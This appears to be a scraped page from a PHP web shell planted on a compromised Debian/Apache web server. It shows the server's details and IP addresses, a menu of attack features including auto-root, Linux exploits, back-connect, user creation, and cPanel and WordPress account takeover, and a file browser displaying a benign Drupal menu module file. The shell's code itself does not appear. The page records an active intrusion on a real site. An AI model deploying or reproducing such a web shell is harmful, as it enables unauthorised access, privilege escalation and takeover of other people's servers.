Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.136.19.136
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
menu /
[ HOME SHELL ]
Name
Size
Permission
Action
menu.admin.inc
27.62
KB
-rw-r--r--
menu.admin.js
1.39
KB
-rw-r--r--
menu.api.php
2.52
KB
-rw-r--r--
menu.css
117
B
-rw-r--r--
menu.info
312
B
-rw-r--r--
menu.install
6.96
KB
-rw-r--r--
menu.js
2.44
KB
-rw-r--r--
menu.module
27.65
KB
-rw-r--r--
menu.test
26.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.api.php
<?php /** * @file * Hooks provided by the Menu module. */ /** * @addtogroup hooks * @{ */ /** * Respond to a custom menu creation. * * This hook is used to notify modules that a custom menu has been created. * Contributed modules may use the information to perform actions based on the * information entered into the menu system. * * @param $menu * An array representing a custom menu: * - menu_name: The unique name of the custom menu. * - title: The human readable menu title. * - description: The custom menu description. * * @see hook_menu_update() * @see hook_menu_delete() */ function hook_menu_insert($menu) { // For example, we track available menus in a variable. $my_menus = variable_get('my_module_menus', array()); $my_menus[$menu['menu_name']] = $menu['menu_name']; variable_set('my_module_menus', $my_menus); } /** * Respond to a custom menu update. * * This hook is used to notify modules that a custom menu has been updated. * Contributed modules may use the information to perform actions based on the * information entered into the menu system. * * @param $menu * An array representing a custom menu: * - menu_name: The unique name of the custom menu. * - title: The human readable menu title. * - description: The custom menu description. * - old_name: The current 'menu_name'. Note that internal menu names cannot * be changed after initial creation. * * @see hook_menu_insert() * @see hook_menu_delete() */ function hook_menu_update($menu) { // For example, we track available menus in a variable. $my_menus = variable_get('my_module_menus', array()); $my_menus[$menu['menu_name']] = $menu['menu_name']; variable_set('my_module_menus', $my_menus); } /** * Respond to a custom menu deletion. * * This hook is used to notify modules that a custom menu along with all links * contained in it (if any) has been deleted. Contributed modules may use the * information to perform actions based on the information entered into the menu * system. * * @param $menu * An array representing a custom menu: * - menu_name: The unique name of the custom menu. * - title: The human readable menu title. * - description: The custom menu description. * * @see hook_menu_insert() * @see hook_menu_update() */ function hook_menu_delete($menu) { // Delete the record from our variable. $my_menus = variable_get('my_module_menus', array()); unset($my_menus[$menu['menu_name']]); variable_set('my_module_menus', $my_menus); } /** * @} End of "addtogroup hooks". */
Close